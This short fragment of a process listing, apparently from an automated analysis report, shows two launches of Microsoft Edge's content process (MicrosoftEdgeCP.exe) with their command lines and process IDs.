C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10156